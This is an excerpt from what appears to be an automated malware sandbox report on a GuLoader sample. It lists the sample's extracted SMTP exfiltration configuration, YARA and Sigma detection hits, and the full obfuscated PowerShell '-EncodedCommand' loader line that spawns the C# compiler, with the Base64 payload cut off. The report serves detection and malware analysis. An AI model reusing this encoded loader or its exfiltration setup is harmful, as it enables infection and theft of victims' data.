{"Exfil Mode": "SMTP", "SMTP Info": "COCO_.zipCookieapplication/zip-f \\Data\\Tor\\torrcp=127.0.0.1POST+%2Bapplication/x-www-form-urlencoded"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
  • 0x167de:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
    • 0x16862:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
    00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_JAB_Pattern_Jun22_1Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variableFlorian Roth
      • 0x4886:$xc3: 4A 41 42 70 41 44 30 41
      Click to see the 15 entries

      Sigma Signatures

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBH